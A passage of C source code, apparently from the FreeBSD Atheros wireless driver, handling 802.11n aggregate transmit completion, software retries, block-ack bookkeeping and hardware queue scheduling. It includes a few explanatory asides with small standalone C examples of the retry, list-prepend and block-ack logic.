bf->bf_state.bfs_retries = SWMAX_RETRIES + 1; } if (bf->bf_state.bfs_retries >= SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_RETRIES, "%s: max retries: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); bf->bf_state.bfs_dobaw = 0; return 1; } ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swretries++; bf->bf_next = NULL; /* Just to make sure */ /* Clear the aggregate state */ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_ndelim = 0; /* ??? needed? */ bf->bf_state.bfs_nframes = 1; TAILQ_INSERT_TAIL(bf_q, bf, bf_list); return 0; } /* * error pkt completion for an aggregate destination */ static void ath_tx_comp_aggr_error(struct ath_softc *sc, struct ath_buf *bf_first, struct ath_tid *tid) { struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); struct ath_buf *bf_next, *bf; ath_bufhead bf_q; int drops = 0; struct ieee80211_tx_ampdu *tap; ath_bufhead bf_cq; TAILQ_INIT(&bf_q); TAILQ_INIT(&bf_cq); /* * Update rate control - all frames have failed. * * XXX use the length in the first frame in the series; * XXX just so things are consistent for now. 
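(Aside: both retry paths above apply the same policy: once a frame has used up its software retries it is dropped and a BAR is scheduled, otherwise the retry counter is bumped and the frame is re-queued at the head so it goes out before newer traffic. A tiny sketch of that decision follows; the names and the retry limit are hypothetical, not the driver's SWMAX_RETRIES machinery.)

#include <stdbool.h>
#include <stdio.h>

#define SW_MAX_RETRIES 10               /* hypothetical software retry limit */

struct txframe {
        int seqno;
        int retries;
};

/*
 * Returns true if the frame should be retransmitted (counter bumped),
 * false if it has exhausted its retries and must be dropped instead.
 */
static bool
should_retry(struct txframe *f)
{
        if (f->retries >= SW_MAX_RETRIES)
                return (false);         /* caller drops the frame and schedules a BAR */
        f->retries++;
        return (true);                  /* caller re-queues at the head of the TID queue */
}

int
main(void)
{
        struct txframe f = { .seqno = 100, .retries = 9 };

        printf("first attempt: retry=%d\n", should_retry(&f));   /* 1: one retry left */
        printf("second attempt: retry=%d\n", should_retry(&f));  /* 0: limit reached */
        return (0);
}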
*/ ath_tx_update_ratectrl(sc, ni, bf_first->bf_state.bfs_rc, &bf_first->bf_status.ds_txstat, bf_first->bf_state.bfs_pktlen, bf_first->bf_state.bfs_nframes, bf_first->bf_state.bfs_nframes); ATH_TX_LOCK(sc); tap = ath_tx_get_tx_tid(an, tid->tid); sc->sc_stats.ast_tx_aggr_failall++; /* Retry all subframes */ bf = bf_first; while (bf) { bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ sc->sc_stats.ast_tx_aggr_fail++; if (ath_tx_retry_subframe(sc, bf, &bf_q)) { drops++; bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } bf = bf_next; } /* Prepend all frames to the beginning of the queue */ while ((bf = TAILQ_LAST(&bf_q, ath_bufhead_s)) != NULL) { TAILQ_REMOVE(&bf_q, bf, bf_list); ATH_TID_INSERT_HEAD(tid, bf, bf_list); } /* * Schedule the TID to be re-tried. */ ath_tx_tid_sched(sc, tid); /* * send bar if we dropped any frames * * Keep the txq lock held for now, as we need to ensure * that ni_txseqs[] is consistent (as it's being updated * in the ifnet TX context or raw TX context.) */ if (drops) { /* Suspend the TX queue and get ready to send the BAR */ ath_tx_tid_bar_suspend(sc, tid); } /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, tid)) ath_tx_tid_bar_tx(sc, tid); ATH_TX_UNLOCK(sc); /* Complete frames which errored out */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle clean-up of packets from an aggregate list. * * There's no need to update the BAW here - the session is being * torn down. */ static void ath_tx_comp_cleanup_aggr(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf, *bf_next; struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf_first->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; ATH_TX_LOCK(sc); /* update incomp */ bf = bf_first; while (bf) { atid->incomp--; bf = bf->bf_next; } if (atid->incomp == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleaned up! resume!\n", __func__, tid); atid->cleanup_inprogress = 0; ath_tx_tid_resume(sc, atid); } /* Send BAR if required */ /* XXX why would we send a BAR when transitioning to non-aggregation? */ /* * XXX TODO: we should likely just tear down the BAR state here, * rather than sending a BAR. */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Handle frame completion */ bf = bf_first; while (bf) { bf_next = bf->bf_next; ath_tx_default_comp(sc, bf, 1); bf = bf_next; } } /* * Handle completion of an set of aggregate frames. * * Note: the completion handler is the last descriptor in the aggregate, * not the last descriptor in the first frame. */ static void ath_tx_aggr_comp_aggr(struct ath_softc *sc, struct ath_buf *bf_first, int fail) { //struct ath_desc *ds = bf->bf_lastds; struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf_first->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status ts; struct ieee80211_tx_ampdu *tap; ath_bufhead bf_q; ath_bufhead bf_cq; int seq_st, tx_ok; int hasba, isaggr; uint32_t ba[2]; struct ath_buf *bf, *bf_next; int ba_index; int drops = 0; int nframes = 0, nbad = 0, nf; int pktlen; /* XXX there's too much on the stack? */ struct ath_rc_series rc[ATH_RC_NUM]; int txseq; DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: called; hwq_depth=%d\n", __func__, atid->hwq_depth); /* * Take a copy; this may be needed -after- bf_first * has been completed and freed. 
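(Aside: the error path above re-queues every surviving subframe by repeatedly taking the last entry of the temporary retry list and pushing it onto the head of the TID queue; reversing the list twice like this preserves the original frame order. A small sketch of that idiom with hypothetical types.)

#include <sys/queue.h>
#include <stdio.h>

struct frame {
        int seqno;
        TAILQ_ENTRY(frame) link;
};
TAILQ_HEAD(framehead, frame);

/*
 * Move every entry from 'retry' to the front of 'tidq' while keeping the
 * relative order of 'retry': popping from the tail and pushing onto the
 * head reverses the list twice, so the order is preserved.
 */
static void
prepend_all(struct framehead *tidq, struct framehead *retry)
{
        struct frame *f;

        while ((f = TAILQ_LAST(retry, framehead)) != NULL) {
                TAILQ_REMOVE(retry, f, link);
                TAILQ_INSERT_HEAD(tidq, f, link);
        }
}

int
main(void)
{
        struct framehead tidq = TAILQ_HEAD_INITIALIZER(tidq);
        struct framehead retry = TAILQ_HEAD_INITIALIZER(retry);
        struct frame a = { .seqno = 1 }, b = { .seqno = 2 }, c = { .seqno = 3 };
        struct frame *f;

        TAILQ_INSERT_TAIL(&retry, &a, link);
        TAILQ_INSERT_TAIL(&retry, &b, link);
        TAILQ_INSERT_TAIL(&retry, &c, link);

        prepend_all(&tidq, &retry);

        TAILQ_FOREACH(f, &tidq, link)
                printf("%d ", f->seqno);        /* prints "1 2 3 " */
        printf("\n");
        return (0);
}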
*/ ts = bf_first->bf_status.ds_txstat; TAILQ_INIT(&bf_q); TAILQ_INIT(&bf_cq); /* The TID state is kept behind the TXQ lock */ ATH_TX_LOCK(sc); atid->hwq_depth--; if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the TID is filtered, handle completing the filter * transition before potentially kicking it to the cleanup * function. * * XXX this is duplicate work, ew. */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * Punt cleanup to the relevant function, not our problem now */ if (atid->cleanup_inprogress) { if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: isfiltered=1, normal_comp?\n", __func__); ATH_TX_UNLOCK(sc); ath_tx_comp_cleanup_aggr(sc, bf_first); return; } /* * If the frame is filtered, transition to filtered frame * mode and add this to the filtered frame list. * * XXX TODO: figure out how this interoperates with * BAR, pause and cleanup states. */ if ((ts.ts_status & HAL_TXERR_FILT) || (ts.ts_status != 0 && atid->isfiltered)) { if (fail != 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: isfiltered=1, fail=%d\n", __func__, fail); ath_tx_tid_filt_comp_aggr(sc, atid, bf_first, &bf_cq); /* Remove from BAW */ TAILQ_FOREACH_SAFE(bf, &bf_cq, bf_list, bf_next) { if (bf->bf_state.bfs_addedbaw) drops++; if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; } /* * If any intermediate frames in the BAW were dropped when * handling filtering things, send a BAR. */ if (drops) ath_tx_tid_bar_suspend(sc, atid); /* * Finish up by sending a BAR if required and freeing * the frames outside of the TX lock. */ goto finish_send_bar; } /* * XXX for now, use the first frame in the aggregate for * XXX rate control completion; it's at least consistent. */ pktlen = bf_first->bf_state.bfs_pktlen; /* * Handle errors first! * * Here, handle _any_ error as a "exceeded retries" error. * Later on (when filtered frames are to be specially handled) * it'll have to be expanded. */ #if 0 if (ts.ts_status & HAL_TXERR_XRETRY) { #endif if (ts.ts_status != 0) { ATH_TX_UNLOCK(sc); ath_tx_comp_aggr_error(sc, bf_first, atid); return; } tap = ath_tx_get_tx_tid(an, tid); /* * extract starting sequence and block-ack bitmap */ /* XXX endian-ness of seq_st, ba? */ seq_st = ts.ts_seqnum; hasba = !! (ts.ts_flags & HAL_TX_BA); tx_ok = (ts.ts_status == 0); isaggr = bf_first->bf_state.bfs_aggr; ba[0] = ts.ts_ba_low; ba[1] = ts.ts_ba_high; /* * Copy the TX completion status and the rate control * series from the first descriptor, as it may be freed * before the rate control code can get its grubby fingers * into things. */ memcpy(rc, bf_first->bf_state.bfs_rc, sizeof(rc)); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: txa_start=%d, tx_ok=%d, status=%.8x, flags=%.8x, " "isaggr=%d, seq_st=%d, hasba=%d, ba=%.8x, %.8x\n", __func__, tap->txa_start, tx_ok, ts.ts_status, ts.ts_flags, isaggr, seq_st, hasba, ba[0], ba[1]); /* * The reference driver doesn't do this; it simply ignores * this check in its entirety. * * I've seen this occur when using iperf to send traffic * out tid 1 - the aggregate frames are all marked as TID 1, * but the TXSTATUS has TID=0. So, let's just ignore this * check. */ #if 0 /* Occasionally, the MAC sends a tx status for the wrong TID. 
*/ if (tid != ts.ts_tid) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: tid %d != hw tid %d\n", __func__, tid, ts.ts_tid); tx_ok = 0; } #endif /* AR5416 BA bug; this requires an interface reset */ if (isaggr && tx_ok && (! hasba)) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: AR5416 bug: hasba=%d; txok=%d, isaggr=%d, " "seq_st=%d\n", __func__, hasba, tx_ok, isaggr, seq_st); /* XXX TODO: schedule an interface reset */ #ifdef ATH_DEBUG ath_printtxbuf(sc, bf_first, sc->sc_ac2q[atid->ac]->axq_qnum, 0, 0); #endif } /* * Walk the list of frames, figure out which ones were correctly * sent and which weren't. */ bf = bf_first; nf = bf_first->bf_state.bfs_nframes; /* bf_first is going to be invalid once this list is walked */ bf_first = NULL; /* * Walk the list of completed frames and determine * which need to be completed and which need to be * retransmitted. * * For completed frames, the completion functions need * to be called at the end of this function as the last * node reference may free the node. * * Finally, since the TXQ lock can't be held during the * completion callback (to avoid lock recursion), * the completion calls have to be done outside of the * lock. */ while (bf) { nframes++; ba_index = ATH_BA_INDEX(seq_st, SEQNO(bf->bf_state.bfs_seqno)); bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: checking bf=%p seqno=%d; ack=%d\n", __func__, bf, SEQNO(bf->bf_state.bfs_seqno), ATH_BA_ISSET(ba, ba_index)); if (tx_ok && ATH_BA_ISSET(ba, ba_index)) { sc->sc_stats.ast_tx_aggr_ok++; ath_tx_update_baw(sc, an, atid, bf); bf->bf_state.bfs_dobaw = 0; if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } else { sc->sc_stats.ast_tx_aggr_fail++; if (ath_tx_retry_subframe(sc, bf, &bf_q)) { drops++; bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } nbad++; } bf = bf_next; } /* * Now that the BAW updates have been done, unlock * * txseq is grabbed before the lock is released so we * have a consistent view of what -was- in the BAW. * Anything after this point will not yet have been * TXed. */ txseq = tap->txa_start; ATH_TX_UNLOCK(sc); if (nframes != nf) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: num frames seen=%d; bf nframes=%d\n", __func__, nframes, nf); /* * Now we know how many frames were bad, call the rate * control code. */ if (fail == 0) ath_tx_update_ratectrl(sc, ni, rc, &ts, pktlen, nframes, nbad); /* * send bar if we dropped any frames */ if (drops) { /* Suspend the TX queue and get ready to send the BAR */ ATH_TX_LOCK(sc); ath_tx_tid_bar_suspend(sc, atid); ATH_TX_UNLOCK(sc); } DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: txa_start now %d\n", __func__, tap->txa_start); ATH_TX_LOCK(sc); /* Prepend all frames to the beginning of the queue */ while ((bf = TAILQ_LAST(&bf_q, ath_bufhead_s)) != NULL) { TAILQ_REMOVE(&bf_q, bf, bf_list); ATH_TID_INSERT_HEAD(atid, bf, bf_list); } /* * Reschedule to grab some further frames. */ ath_tx_tid_sched(sc, atid); /* * If the queue is filtered, re-schedule as required. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. * * XXX should we do this before we complete the frame? 
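(Aside: the completion walk above asks, for each subframe, whether its sequence number was acknowledged in the 64-bit block-ack bitmap returned with the TX status. As a rough illustration of how such a check works, with simplified hypothetical helpers rather than the driver's ATH_BA_INDEX/ATH_BA_ISSET macros: the bit position is the distance of the subframe's sequence number from the BA starting sequence, taken modulo the 12-bit sequence space, and that bit is then looked up in the two 32-bit bitmap words.)

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define SEQ_RANGE   4096                /* 12-bit 802.11 sequence space */
#define BA_BMP_BITS 64                  /* the block-ack bitmap covers 64 subframes */

/* Distance of seqno from the BA starting sequence, within the 12-bit space. */
static unsigned
ba_index(unsigned seq_start, unsigned seqno)
{
        return ((seqno - seq_start) & (SEQ_RANGE - 1));
}

/* True if the subframe at that index was acknowledged in the bitmap. */
static bool
ba_isset(const uint32_t ba[2], unsigned idx)
{
        if (idx >= BA_BMP_BITS)
                return (false);         /* outside the window: treat as unacked */
        return ((ba[idx >> 5] & (1U << (idx & 31))) != 0);
}

int
main(void)
{
        uint32_t ba[2] = { 0x0000000f, 0x00000000 };    /* first four subframes acked */
        unsigned seq_start = 4094;

        /* Sequence 4095 is one past the start; sequence 1 is three past it (wraps). */
        printf("seq 4095 acked: %d\n", ba_isset(ba, ba_index(seq_start, 4095)));  /* 1 */
        printf("seq 1 acked:    %d\n", ba_isset(ba, ba_index(seq_start, 1)));     /* 1 */
        printf("seq 10 acked:   %d\n", ba_isset(ba, ba_index(seq_start, 10)));    /* 0 */
        return (0);
}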
*/ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); finish_send_bar: /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Do deferred completion */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle completion of unaggregated frames in an ADDBA * session. * * Fail is set to 1 if the entry is being freed via a call to * ath_tx_draintxq(). */ static void ath_tx_aggr_comp_unaggr(struct ath_softc *sc, struct ath_buf *bf, int fail) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status ts; int drops = 0; /* * Take a copy of this; filtering/cloning the frame may free the * bf pointer. */ ts = bf->bf_status.ds_txstat; /* * Update rate control status here, before we possibly * punt to retry or cleanup. * * Do it outside of the TXQ lock. */ if (fail == 0 && ((bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) == 0)) ath_tx_update_ratectrl(sc, ni, bf->bf_state.bfs_rc, &bf->bf_status.ds_txstat, bf->bf_state.bfs_pktlen, 1, (ts.ts_status == 0) ? 0 : 1); /* * This is called early so atid->hwq_depth can be tracked. * This unfortunately means that it's released and regrabbed * during retry and cleanup. That's rather inefficient. */ ATH_TX_LOCK(sc); if (tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=16!\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: tid=%d, hwq_depth=%d, seqno=%d\n", __func__, bf, bf->bf_state.bfs_tid, atid->hwq_depth, SEQNO(bf->bf_state.bfs_seqno)); atid->hwq_depth--; if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the TID is filtered, handle completing the filter * transition before potentially kicking it to the cleanup * function. */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * If a cleanup is in progress, punt to comp_cleanup; * rather than handling it here. It's thus their * responsibility to clean up, call the completion * function in net80211, etc. */ if (atid->cleanup_inprogress) { if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=1, normal_comp?\n", __func__); ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: cleanup_unaggr\n", __func__); ath_tx_comp_cleanup_unaggr(sc, bf); return; } /* * XXX TODO: how does cleanup, BAR and filtered frame handling * overlap? * * If the frame is filtered OR if it's any failure but * the TID is filtered, the frame must be added to the * filtered frame list. * * However - a busy buffer can't be added to the filtered * list as it will end up being recycled without having * been made available for the hardware. */ if ((ts.ts_status & HAL_TXERR_FILT) || (ts.ts_status != 0 && atid->isfiltered)) { int freeframe; if (fail != 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=1, fail=%d\n", __func__, fail); freeframe = ath_tx_tid_filt_comp_single(sc, atid, bf); if (freeframe) { /* Remove from BAW */ if (bf->bf_state.bfs_addedbaw) drops++; if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; } /* * If the frame couldn't be filtered, treat it as a drop and * prepare to send a BAR. 
*/ if (freeframe && drops) ath_tx_tid_bar_suspend(sc, atid); /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* * If freeframe is set, then the frame couldn't be * cloned and bf is still valid. Just complete/free it. */ if (freeframe) ath_tx_default_comp(sc, bf, fail); return; } /* * Don't bother with the retry check if all frames * are being failed (eg during queue deletion.) */ #if 0 if (fail == 0 && ts->ts_status & HAL_TXERR_XRETRY) { #endif if (fail == 0 && ts.ts_status != 0) { ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: retry_unaggr\n", __func__); ath_tx_aggr_retry_unaggr(sc, bf); return; } /* Success? Complete */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=%d, seqno %d\n", __func__, tid, SEQNO(bf->bf_state.bfs_seqno)); if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); bf->bf_state.bfs_dobaw = 0; if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } /* * If the queue is filtered, re-schedule as required. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. * * XXX should we do this before we complete the frame? */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); ath_tx_default_comp(sc, bf, fail); /* bf is freed at this point */ } void ath_tx_aggr_comp(struct ath_softc *sc, struct ath_buf *bf, int fail) { if (bf->bf_state.bfs_aggr) ath_tx_aggr_comp_aggr(sc, bf, fail); else ath_tx_aggr_comp_unaggr(sc, bf, fail); } /* * Schedule some packets from the given node/TID to the hardware. * * This is the aggregate version. */ void ath_tx_tid_hw_queue_aggr(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid) { struct ath_buf *bf; struct ath_txq *txq = sc->sc_ac2q[tid->ac]; struct ieee80211_tx_ampdu *tap; ATH_AGGR_STATUS status; ath_bufhead bf_q; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d\n", __func__, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* * XXX TODO: If we're called for a queue that we're leaking frames to, * ensure we only leak one. */ tap = ath_tx_get_tx_tid(an, tid->tid); if (tid->tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: called for TID=NONQOS_TID?\n", __func__); for (;;) { status = ATH_AGGR_DONE; /* * If the upper layer has paused the TID, don't * queue any further packets. * * This can also occur from the completion task because * of packet loss; but as its serialised with this code, * it won't "appear" half way through queuing packets. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) break; bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } /* * If the packet doesn't fall within the BAW (eg a NULL * data frame), schedule it directly; continue. */ if (! bf->bf_state.bfs_dobaw) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: non-baw packet\n", __func__); ATH_TID_REMOVE(tid, bf, bf_list); if (bf->bf_state.bfs_nframes > 1) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: aggr=%d, nframes=%d\n", __func__, bf->bf_state.bfs_aggr, bf->bf_state.bfs_nframes); /* * This shouldn't happen - such frames shouldn't * ever have been queued as an aggregate in the * first place. However, make sure the fields * are correctly setup just to be totally sure. 
*/ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); sc->sc_aggr_stats.aggr_nonbaw_pkt++; /* Queue the packet; continue */ goto queuepkt; } TAILQ_INIT(&bf_q); /* * Do a rate control lookup on the first frame in the * list. The rate control code needs that to occur * before it can determine whether to TX. * It's inaccurate because the rate control code doesn't * really "do" aggregate lookups, so it only considers * the size of the first frame. */ ath_tx_do_ratelookup(sc, bf); bf->bf_state.bfs_rc[3].rix = 0; bf->bf_state.bfs_rc[3].tries = 0; ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); status = ath_tx_form_aggr(sc, an, tid, &bf_q); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: ath_tx_form_aggr() status=%d\n", __func__, status); /* * No frames to be picked up - out of BAW */ if (TAILQ_EMPTY(&bf_q)) break; /* * This assumes that the descriptor list in the ath_bufhead * are already linked together via bf_next pointers. */ bf = TAILQ_FIRST(&bf_q); if (status == ATH_AGGR_8K_LIMITED) sc->sc_aggr_stats.aggr_rts_aggr_limited++; /* * If it's the only frame send as non-aggregate * assume that ath_tx_form_aggr() has checked * whether it's in the BAW and added it appropriately. */ if (bf->bf_state.bfs_nframes == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: single-frame aggregate\n", __func__); /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_ndelim = 0; ath_tx_setds(sc, bf); ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); if (status == ATH_AGGR_BAW_CLOSED) sc->sc_aggr_stats.aggr_baw_closed_single_pkt++; else sc->sc_aggr_stats.aggr_single_pkt++; } else { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: multi-frame aggregate: %d frames, " "length %d\n", __func__, bf->bf_state.bfs_nframes, bf->bf_state.bfs_al); bf->bf_state.bfs_aggr = 1; sc->sc_aggr_stats.aggr_pkts[bf->bf_state.bfs_nframes]++; sc->sc_aggr_stats.aggr_aggr_pkt++; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* * Calculate the duration/protection as required. */ ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); /* * Update the rate and rtscts information based on the * rate decision made by the rate control code; * the first frame in the aggregate needs it. */ ath_tx_set_rtscts(sc, bf); /* * Setup the relevant descriptor fields * for aggregation. The first descriptor * already points to the rest in the chain. */ ath_tx_setds_11n(sc, bf); } queuepkt: /* Set completion handler, multi-frame aggregate or not */ bf->bf_comp = ath_tx_aggr_comp; if (bf->bf_state.bfs_tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=16?\n", __func__); /* * Update leak count and frame config if were leaking frames. * * XXX TODO: it should update all frames in an aggregate * correctly! */ ath_tx_leak_count_update(sc, tid, bf); /* Punt to txq */ ath_tx_handoff(sc, txq, bf); /* Track outstanding buffer count to hardware */ /* aggregates are "one" buffer */ tid->hwq_depth++; /* * Break out if ath_tx_form_aggr() indicated * there can't be any further progress (eg BAW is full.) * Checking for an empty txq is done above. 
* * XXX locking on txq here? */ /* XXX TXQ locking */ if (txq->axq_aggr_depth >= sc->sc_hwq_limit_aggr || (status == ATH_AGGR_BAW_CLOSED || status == ATH_AGGR_LEAK_CLOSED)) break; } } /* * Schedule some packets from the given node/TID to the hardware. * * XXX TODO: this routine doesn't enforce the maximum TXQ depth. * It just dumps frames into the TXQ. We should limit how deep * the transmit queue can grow for frames dispatched to the given * TXQ. * * To avoid locking issues, either we need to own the TXQ lock * at this point, or we need to pass in the maximum frame count * from the caller. */ void ath_tx_tid_hw_queue_norm(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid) { struct ath_buf *bf; struct ath_txq *txq = sc->sc_ac2q[tid->ac]; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: node %p: TID %d: called\n", __func__, an, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* Check - is AMPDU pending or running? then print out something */ if (ath_tx_ampdu_pending(sc, an, tid->tid)) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ampdu pending?\n", __func__, tid->tid); if (ath_tx_ampdu_running(sc, an, tid->tid)) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ampdu running?\n", __func__, tid->tid); for (;;) { /* * If the upper layers have paused the TID, don't * queue any further packets. * * XXX if we are leaking frames, make sure we decrement * that counter _and_ we continue here. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) break; bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } ATH_TID_REMOVE(tid, bf, bf_list); /* Sanity check! */ if (tid->tid != bf->bf_state.bfs_tid) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bfs_tid %d !=" " tid %d\n", __func__, bf->bf_state.bfs_tid, tid->tid); } /* Normal completion handler */ bf->bf_comp = ath_tx_normal_comp; /* * Override this for now, until the non-aggregate * completion handler correctly handles software retransmits. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* Program descriptors + rate control */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); /* Track outstanding buffer count to hardware */ /* aggregates are "one" buffer */ tid->hwq_depth++; /* Punt to hardware or software txq */ ath_tx_handoff(sc, txq, bf); } } /* * Schedule some packets to the given hardware queue. * * This function walks the list of TIDs (ie, ath_node TIDs * with queued traffic) and attempts to schedule traffic * from them. * * TID scheduling is implemented as a FIFO, with TIDs being * added to the end of the queue after some frames have been * scheduled. */ void ath_txq_sched(struct 